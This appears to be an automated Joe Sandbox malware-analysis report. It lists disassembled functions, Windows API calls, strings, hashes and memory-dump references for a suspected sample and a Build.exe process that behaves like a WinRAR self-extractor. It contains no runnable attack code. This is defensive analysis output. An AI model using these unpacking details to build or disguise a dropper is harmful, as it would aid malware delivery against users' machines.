Opcode Fuzzy Hash: bd14039b9dc44c48f3afba7226bd4a8f48c08aeb5fb2f86f7c5774b76e28317a
Instruction Fuzzy Hash: 8D71D4B2B08AC186D7659F26D04037D7BA1FB41FA8F0481B2DA8D0B6AACB3CD461C741

Function 00007FFE1A4544E4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4545DB
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A4545EB

Strings

csm, xrefs: 00007FFE1A45463D
csm, xrefs: 00007FFE1A45452E

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: 08ef0bffa0d8dc861c4a01b7d2fd628c67e896dc6c26123b9582640005c51e48
Instruction ID: de0bbe02d8b80d45672660b4dc0e76c3c97907b3f4d833729b3815f7139b15e7
Opcode Fuzzy Hash: 08ef0bffa0d8dc861c4a01b7d2fd628c67e896dc6c26123b9582640005c51e48
Instruction Fuzzy Hash: DC51A4B2B08A8586EB649B12914437976A1FB50FA4F1441F7DB4C4BBA6CF3CE571CB00

Function 00007FFE1A45B118 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A45B172

Strings

%lf, xrefs: 00007FFE1A45B1AD, 00007FFE1A45B1E1, 00007FFE1A45B211

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: 7e0deb2cf17bd330c849068a4ca2fc9bc064bfcc9212df10860184869afe9d43
Instruction ID: d2b3330a5854bd68c2839003d70c3650593197a4c269079963081034022440b0
Opcode Fuzzy Hash: 7e0deb2cf17bd330c849068a4ca2fc9bc064bfcc9212df10860184869afe9d43
Instruction Fuzzy Hash: B331B7A1B0CF4685EA11EB13A8501BA7361BF55FA0F5481F7EA5E53771EE2CE162C700

Function 00007FFE1A452A50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452A8E

Strings

csm, xrefs: 00007FFE1A452A70
RCC, xrefs: 00007FFE1A452A60
MOC, xrefs: 00007FFE1A452A68

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
Instruction ID: bf05f5ed05f654c924678f930fc850e68dc2489998943898e4d87e2a05e401aa
Opcode Fuzzy Hash: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
Instruction Fuzzy Hash: EBF03C72A18A0686E7A47B63E18107D7664EF48F61F1950F3EB4806262CF7CE8B0C701

Function 00007FFE1A45A638 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CE4D
Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CE86
Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D1B1

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A793
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A7F2
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A824
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A834

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: cc076bc81e8f2d48ba6aefa04368e4e4f2bc5c7ef048a26b3748b4f62f7846b0
Instruction ID: e2f86aca1f601f7042d61afb5962c07a50ea380ada2080909daca55c9a1d71c2
Opcode Fuzzy Hash: cc076bc81e8f2d48ba6aefa04368e4e4f2bc5c7ef048a26b3748b4f62f7846b0
Instruction Fuzzy Hash: FA914BA2F08F5289F7119B66D8443BC37B1BB04B68F5440F7DA4D176A5DF78A8A6C340

Function 00007FFE1A45D274 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A45ED94: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A45EDEE

Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CE4D
Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45CE86
Part of subcall function 00007FFE1A45CDBC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D1B1

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D2F4
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D303
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D380
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45D38F

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID:
API String ID: 3863519203-0
Opcode ID: 57265f9aaea93611d8ae4b0edf9f43af56394ecd72ecd9aef4b3b93798ee479d
Instruction ID: 9e8a31f296105f5cfc6c94cd492f7fb90470b07ebc3ddefbf57ebb7c5ca3f9eb
Opcode Fuzzy Hash: 57265f9aaea93611d8ae4b0edf9f43af56394ecd72ecd9aef4b3b93798ee479d
Instruction Fuzzy Hash: 104166B2B08B4189FB01DF66D8403BC37B0BB48B68F9484B6DA8D57769DF789495C350

Function 00007FFE1A4609FC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE1A460A28
GetCurrentThreadId.KERNEL32 ref: 00007FFE1A460A36
GetCurrentProcessId.KERNEL32 ref: 00007FFE1A460A42
QueryPerformanceCounter.KERNEL32 ref: 00007FFE1A460A52

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 74344bb322e65ea4bb1ed5ded81f371800f489492d84809563666ba838173471
Instruction ID: 33dffdaf724ecdefb08a3f1d2a2de64897ed55664a948e8fbf907ee1024d40a7
Opcode Fuzzy Hash: 74344bb322e65ea4bb1ed5ded81f371800f489492d84809563666ba838173471
Instruction Fuzzy Hash: 7E113022B18F418AEB00CF61E8542B833B4F759B68F440E72DA6D477A8DF7CE1688340

Function 00007FFE1A45F670 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A45F732
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1A45F435), ref: 00007FFE1A45F78C

Strings

csm, xrefs: 00007FFE1A45F719

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind
String ID: csm
API String ID: 451473138-1018135373
Opcode ID: 88d75f8372be57577a220e465c4aa8d65e851ebfefcdd899ecde71752cd89d28
Instruction ID: 3e254eb058274db80f329d4f6bdb0b1a4564a01dbbbef0ed088735ea23cff000
Opcode Fuzzy Hash: 88d75f8372be57577a220e465c4aa8d65e851ebfefcdd899ecde71752cd89d28
Instruction Fuzzy Hash: 7A51D572B19A028ADB18EB17E444A7C73A1EB44FA4F1081F6DA5D437A8DF3DE861C701

Function 00007FFE1A454E40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1A454F16
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A454F74

Strings

csm, xrefs: 00007FFE1A45501A

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: a8b8ee24cb783e7d293a6e1db454b28b1bfc46eb23a73e5049af87221528bbc6
Instruction ID: 6c548b89e410d91d6acf8a4d69b70324756b5b1b9ef40ebb5ab467b027ff0735
Opcode Fuzzy Hash: a8b8ee24cb783e7d293a6e1db454b28b1bfc46eb23a73e5049af87221528bbc6
Instruction Fuzzy Hash: 1F511C73719B4186D660AB26E44027E77A4FB89FA1F1401B6EB8D47B65CF3CE461CB01

Function 00007FFE1A45A524 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A622

Strings

void, xrefs: 00007FFE1A45A584
void , xrefs: 00007FFE1A45A5AC

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: d81aed41cb4c8c5c69bd061dfd49733f36ea67ee8bb27e73bf8cb873ba0293ca
Instruction ID: 6a3847a797ea34b0243600d97617f3cdeba82360af4f26f101c998dbfe1bd0e4
Opcode Fuzzy Hash: d81aed41cb4c8c5c69bd061dfd49733f36ea67ee8bb27e73bf8cb873ba0293ca
Instruction Fuzzy Hash: 373105A2F18B559DFB01DBA5E8400FC37B0BB48B58F4405B6EA4E53A69DF3C9164C750

Function 00007FFE1A45676F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456B10: RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A456B60
Part of subcall function 00007FFE1A456B10: RaiseException.KERNEL32 ref: 00007FFE1A456BA1

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A4567DF

Strings

Bad dynamic_cast!, xrefs: 00007FFE1A456792
Access violation - no RTTI data!, xrefs: 00007FFE1A45676F

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
Instruction ID: 17a2e61351ae8dc12e7991a8cfa1d336490933007049f6bf365d772dc3632de2
Opcode Fuzzy Hash: 161e8b28e34caca24568961a6528755d3751e4ffa6d3c1bec0c9a5cac7a2823b
Instruction Fuzzy Hash: 690175A1B19D46A1EE40EB16F450178A360FF80F64F4854F3E51E07679EF6CE568C700

Function 00007FFE1A456B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A456B60
RaiseException.KERNEL32 ref: 00007FFE1A456BA1

Strings

csm, xrefs: 00007FFE1A456B8E

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
Instruction ID: cbebe9d87d3f32192772af2eaa90a002eec98cf13a5b03ff9fcc6ff7f3e1d358
Opcode Fuzzy Hash: 96783e5d5ee86e7ed91570add2de904558e3ade983638e121ecc73efc59d9239
Instruction Fuzzy Hash: 86112E72618F8182EB618B16F840269B7E5FB88F99F5842B1DF8C07768DF3DD5618700

Function 00007FFE1A45F420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45F45A

Strings

csm, xrefs: 00007FFE1A45F43B
f, xrefs: 00007FFE1A45F435

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: abortterminate
String ID: csm$f
API String ID: 661698970-629598281
Opcode ID: f31257b661c57643b6b4b1793288747ab2a9155158c122d579431834bbccefac
Instruction ID: 466f39f7d2c6ad8747c7229578763f3ef958adfb448de98c0d7c4ff533c0d341
Opcode Fuzzy Hash: f31257b661c57643b6b4b1793288747ab2a9155158c122d579431834bbccefac
Instruction Fuzzy Hash: 70E06C71E08B5141DB507B23B14017D6664AF56F75F1480F6DB4807666CF3CD4B08702

Function 00007FFE1A456E64 Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE1A456CE9,?,?,?,?,00007FFE1A460582,?,?,?,?,?), ref: 00007FFE1A456E83
SetLastError.KERNEL32(?,?,?,00007FFE1A456CE9,?,?,?,?,00007FFE1A460582,?,?,?,?,?), ref: 00007FFE1A456F0C

Memory Dump Source

Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
Instruction ID: 33c700dcbbda43727ad60f5bfec39fe087911570393653a7a61029dbca3fc842
Opcode Fuzzy Hash: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
Instruction Fuzzy Hash: 181136A1F0DE4282FA55AB67A84417462A1AF44FB4F084AF6E93E077F5DF2CB4618710

Analysis Process: Build.exePID: 7736, Parent PID: 7680COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	1722
Total number of Limit Nodes:	39

Executed Functions

Function 0037EA07 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 453
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0037D6C7

Part of subcall function 0037C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0037C5E5

SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,92C77967,?,00000000,00000001), ref: 0037EB53
_wcslen.LIBCMT ref: 0037EB8D
_wcslen.LIBCMT ref: 0037EBA1
_wcslen.LIBCMT ref: 0037EBC6
GetFileAttributesW.KERNEL32(?), ref: 0037EC0C
DeleteFileW.KERNEL32(?), ref: 0037EC1E
_swprintf.LIBCMT ref: 0037EC43
GetFileAttributesW.KERNEL32(?), ref: 0037EC52
MoveFileW.KERNEL32(?,?), ref: 0037EC6B
MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0037EC7F
_wcslen.LIBCMT ref: 0037ECFA
_wcslen.LIBCMT ref: 0037ED03
SetWindowTextW.USER32(?,?), ref: 0037ED62

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0037EE0B
<br>, xrefs: 0037ECC4
ProgramFilesDir, xrefs: 0037EE36
%s.%d.tmp, xrefs: 0037EC36

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2983673336-312220925
Opcode ID: 839f56f8370482eff62716640e33ee2856f4983b11a5f88d131f77b0c7c4f259
Instruction ID: fea5fb61b8315b935d2655d57207332ae2ea0a09b3b8d7a4d2bcfa25e556168f
Opcode Fuzzy Hash: 839f56f8370482eff62716640e33ee2856f4983b11a5f88d131f77b0c7c4f259
Instruction Fuzzy Hash: 6AF15272900249AEDB33EFA4DC85EEF37BCBF49310F04856AE909DB150EB749A458B50

Function 0038037C Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 208
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037290A: GetModuleHandleW.KERNEL32 ref: 00372937
Part of subcall function 0037290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00372949
Part of subcall function 0037290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00372973

Part of subcall function 0037C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0037C5E5

Part of subcall function 0037CCD9: OleInitialize.OLE32(00000000), ref: 0037CCF2
Part of subcall function 0037CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037CD29
Part of subcall function 0037CCD9: SHGetMalloc.SHELL32(003AC460), ref: 0037CD33

GetCommandLineW.KERNEL32 ref: 003803C9
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 003803F3
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00380404
UnmapViewOfFile.KERNEL32(00000000), ref: 00380455

Part of subcall function 0037FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037FFFE
Part of subcall function 0037FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00380038

Part of subcall function 00371421: _wcslen.LIBCMT ref: 00371445

CloseHandle.KERNEL32(00000000), ref: 0038045C
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe,00000800), ref: 00380476
SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe), ref: 00380482
GetLocalTime.KERNEL32(?), ref: 0038048D
_swprintf.LIBCMT ref: 003804E1
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 003804F6
GetModuleHandleW.KERNEL32(00000000), ref: 003804FD
LoadIconW.USER32(00000000,00000064), ref: 00380514
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00380565
Sleep.KERNEL32(?), ref: 00380593
DeleteObject.GDI32 ref: 003805CC
DeleteObject.GDI32(?), ref: 003805DC
CloseHandle.KERNEL32 ref: 0038061F

Strings

sfxname, xrefs: 0038047D
C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe, xrefs: 0038046F, 00380474, 0038047C, 00380524
STARTDLG, xrefs: 0038055A
sfxstime, xrefs: 003804F1
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 003804D2
winrarsfxmappingfile.tmp, xrefs: 003803E7
pP:, xrefs: 00380525

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe$STARTDLG$pP:$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3014515783-3491473713
